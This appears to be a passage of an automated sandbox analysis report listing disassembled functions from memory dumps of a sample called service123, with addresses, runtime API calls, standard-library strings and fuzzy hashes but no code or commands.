Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 6ebffdfb57d5f3086513d89696fe03b4cada32767b666f8eef34774531c5cae1
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 82D1E7716083458BD708CF29C484B4BB7E2AFC5348F99C92DE8948BB45E771D929CF92

Function 00013E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 00013FD9
., xrefs: 00014114
gfff, xrefs: 00013F43
gfff, xrefs: 00013F2C

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: ce32dc5280e9a50cb78655521d1d98d176eea95772c19c34e7092edbbdf8e686
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: BDD1E671A083068BD754DF29C48039BBBE2AFD4344F19C92DE8588B356D770DDC98B92

Function 6C3E3140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C3E3250

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 60d623aa73e604517abfbfeefd218cbf7a06402dd476c5bf3c174e427311071f
Instruction ID: 1abe6f13f8ae41560f65545df5ffadab4ae790a174d1768f0ce0f435bfcb8882
Opcode Fuzzy Hash: 60d623aa73e604517abfbfeefd218cbf7a06402dd476c5bf3c174e427311071f
Instruction Fuzzy Hash: 9C414AB29092208FD714DF69D4C0A5AFBE4EF99314F15C96EE8988B319D331D845CBA2

Function 6C3E0730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3E07A0
memset.MSVCRT ref: 6C3E07C4

Strings

basic_string::_M_replace_aux, xrefs: 6C3E0840

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: a9e61e16f10a74bf61bb641bb4e9e6f69cc8ecab70cb9d052608238178f8a10e
Instruction ID: 8c33e91657252cf876611ed2974cb950e3a1eeaa2dda31fdb5efb1e07a7385ca
Opcode Fuzzy Hash: a9e61e16f10a74bf61bb641bb4e9e6f69cc8ecab70cb9d052608238178f8a10e
Instruction Fuzzy Hash: B53183756097A08FC3009F29C4C0A1ABFF1AFCA604F24855EE8988B705DA32D845DF92

Function 6C3B3840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C3B3898
memcpy.MSVCRT ref: 6C3B3911

Part of subcall function 6C3B5590: memcpy.MSVCRT ref: 6C3B5620

Strings

basic_string::_M_replace_aux, xrefs: 6C3B38C0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: e5141c8c4515fdcfe45c5f60755be1b5240b7437d06f6edc4a4a0640bfde9a3c
Instruction ID: 7e3fd4922bcab96e041ae71c37da0cf82689324997a76aab2194fde24545f81b
Opcode Fuzzy Hash: e5141c8c4515fdcfe45c5f60755be1b5240b7437d06f6edc4a4a0640bfde9a3c
Instruction Fuzzy Hash: 10215E72A0A3209FC300AF1DD88056EFBE4EB95658F94496EE888A7711D331D858CB93

Function 6C36A9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C36A9FD
wcslen.MSVCRT ref: 6C36AA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C36AA20, 6C36AA70

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 658cd6427c900f35efe7133819dd3ec75f7b2ff1e81a476a4967b60d17ff32c8
Instruction ID: 7e8254f816849a8bea2915d0586e694ad878653f19df0b22d2b0bde7e56a6d56
Opcode Fuzzy Hash: 658cd6427c900f35efe7133819dd3ec75f7b2ff1e81a476a4967b60d17ff32c8
Instruction Fuzzy Hash: 751163B19153248BCB11EF2CD581CAABBF4AF49214F42486EE8C49B715D332D955CF92

Function 6C36A5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C36A60D
wcslen.MSVCRT ref: 6C36A65D

Strings

basic_string: construction from null is not valid, xrefs: 6C36A630, 6C36A680

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 658cd6427c900f35efe7133819dd3ec75f7b2ff1e81a476a4967b60d17ff32c8
Instruction ID: 21dd9c83b9e239f68c7ade487bf9b2f787aaaacc0c26f93fcf56b08edee3ee10
Opcode Fuzzy Hash: 658cd6427c900f35efe7133819dd3ec75f7b2ff1e81a476a4967b60d17ff32c8
Instruction Fuzzy Hash: 611163B19153248BCB11EF2CD481CAABBF4AF49214F42486DE8C49B715D332D959CF92

Function 6C3798F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C37A30E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 8a6be9dc935ffc1e664aa488800df0f6b00be95bc7839d4c8c8f67ff989bf256
Instruction ID: e723cfc001c40c24acf9803946e6808e3ee2551b135563e6b7e8cedc687d3d0c
Opcode Fuzzy Hash: 8a6be9dc935ffc1e664aa488800df0f6b00be95bc7839d4c8c8f67ff989bf256
Instruction Fuzzy Hash: 01A29F31A043598FDB20CF69C48478DBBF2AF46328F288758D865AB691D739DC45CFA1

Function 6C3787C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C3791DE

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: daf77d8fc1be6ea7753f8081e11b68fa22fac4b8b010491448127297cf26fd33
Instruction ID: 6c0dc26b0d59367c5bd3932abe712ac1fdb72585bcaec7b0265619fd61f04c2e
Opcode Fuzzy Hash: daf77d8fc1be6ea7753f8081e11b68fa22fac4b8b010491448127297cf26fd33
Instruction Fuzzy Hash: 99A28C70A043598FDB20CF68C48478DBBB2BF46328F288759D865AB691C739DC45CFA5

Function 6C3B3690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C3B3710

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: f3c321a8667c67e1eb0a228942aad8d0ed96b3efff02878d982a0e607369898e
Instruction ID: 8b38f62bec682bc01dc9c5eaa79f5a627d3537f7fdad07cc189368d8be95c689
Opcode Fuzzy Hash: f3c321a8667c67e1eb0a228942aad8d0ed96b3efff02878d982a0e607369898e
Instruction Fuzzy Hash: 57015AB25093559BC340AF6A80C5B6BFFE4AFA1228F94886DE4C957F11CB36D4448F62

Function 6C36A970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C36A98D

Strings

basic_string: construction from null is not valid, xrefs: 6C36A9B0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: e611b147e2878b992c7b5578276172d3bc990263c2f5703af99ca2bcdfc93ffd
Instruction ID: b37262c7e80e1fb0d7bae3dd206914194058f8936be55195db8ff075044a00be
Opcode Fuzzy Hash: e611b147e2878b992c7b5578276172d3bc990263c2f5703af99ca2bcdfc93ffd
Instruction Fuzzy Hash: 4AF05EB1A153148FCB00EF2CC481C9AB7F4BF49218B5248ADE8C49B715E732E959CF92

Function 6C36A580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C36A59D

Strings

basic_string: construction from null is not valid, xrefs: 6C36A5C0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: e611b147e2878b992c7b5578276172d3bc990263c2f5703af99ca2bcdfc93ffd
Instruction ID: 531077a24936fe68b7c235126d81bceeab3908383ddffff4aed6ae4fae141c60
Opcode Fuzzy Hash: e611b147e2878b992c7b5578276172d3bc990263c2f5703af99ca2bcdfc93ffd
Instruction Fuzzy Hash: 80F030B19152148BCB00EF2CC481C5AB7E4AB45214B42486DD4C49B715E232D959CF92

Function 6C36C510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C36C570
basic_string::substr, xrefs: 6C36C568

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 63a1d51a66186923fe99304481a447b822bd54154810001da3bfe8a5ce54a718
Instruction ID: 13199455e2d460bd9c36b58bd481a9c30a3cfc27ff984cec046823918f05b9ef
Opcode Fuzzy Hash: 63a1d51a66186923fe99304481a447b822bd54154810001da3bfe8a5ce54a718
Instruction Fuzzy Hash: 40017871A182108BCB04EF2DD48095AFBF1AFCA308F5489ADE088DB310D632D949CF96

Function 6C360740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3607A0
basic_string::substr, xrefs: 6C360798

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 3bdc5abc5c7388e85f53314bea2df763cf55e4a3abc24e1b5e8d622f947255a9
Instruction ID: 1003be86e8c0757b42cad3a97745136128171702b49352ee5ece7fa4c9a4fd79
Opcode Fuzzy Hash: 3bdc5abc5c7388e85f53314bea2df763cf55e4a3abc24e1b5e8d622f947255a9
Instruction Fuzzy Hash: 7B0146B2A1A3009FD744CF29D881AABFBE1AFC9350F00996DE4C8D7B00C234D8458B87

Function 6C3846E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80572d3959c23b8b22b2a870b70e01f36ccb09b912a7264a8202cceffb745cbc
Instruction ID: c53f4f8e21e2a244d7a70c1e434dd2d2c01610f6a9a7d007924acfd757d8e384
Opcode Fuzzy Hash: 80572d3959c23b8b22b2a870b70e01f36ccb09b912a7264a8202cceffb745cbc
Instruction Fuzzy Hash: A182AE70E062988FDB10CFA8C0A078DBBF5AF45318F298259E865AFB95D335D845CF91

Function 6C382CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a779fea0d0b8699b7d357d80a4c33562eb6b4a8e11e870481808483dbe775be5
Instruction ID: 78f1180a0b59ec2a6d82b0f5e58c136102f5388254161218c0f70f211ff222d7
Opcode Fuzzy Hash: a779fea0d0b8699b7d357d80a4c33562eb6b4a8e11e870481808483dbe775be5
Instruction Fuzzy Hash: 2272BF70A0A298CFDB51CFA8C48479DBFF1AF05328F148659E4A1ABB91D336E845CF51

Function 6C38140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d4e93583d919fcbd500f1438fe65691d234a41ec413dd4d4a2bd04e8f8d709
Instruction ID: 3e69840a7ae7c9c692ff1618d01e526932dce2c9ee334689545cfebb3aaa36f1
Opcode Fuzzy Hash: f7d4e93583d919fcbd500f1438fe65691d234a41ec413dd4d4a2bd04e8f8d709
Instruction Fuzzy Hash: BE72AE70E0A298CFDB11CFA8C48479DBBF1AF06318F288659D4A5ABB91D335E845CF51

Function 6C382090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306b865e26b3ae51990ea3ce69ed5e073c042d9e2efe6df290d71048b8d38117
Instruction ID: 46fb203f8ffd8d8515f2a00b00e5fc634b67a552cfe002e67c4754ab6092a427
Opcode Fuzzy Hash: 306b865e26b3ae51990ea3ce69ed5e073c042d9e2efe6df290d71048b8d38117
Instruction Fuzzy Hash: 79729B70E0A298CFDB11CFA8C58878DBBF1BF05318F288659D4A5AB791C376A845CF51

Function 6C3807D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7685ba2784d5dcbd4dd8c0fb14f40d1f2e491b9c8d1b8422dc7cb100feee1df
Instruction ID: 1f8b80478a982bfb20909bb1459e03dcc9286da20991c55656e9217a1c122356
Opcode Fuzzy Hash: f7685ba2784d5dcbd4dd8c0fb14f40d1f2e491b9c8d1b8422dc7cb100feee1df
Instruction Fuzzy Hash: 67726B70E0A398CFDB11CFA8C49478DBBF1AF06318F288659D4A5ABB91C375A845CF51

Function 6C36F760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C36F8B3

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 6fc361184bdab02e6166dd783e8574524a1863b96b5bdabc79fb120f03029f68
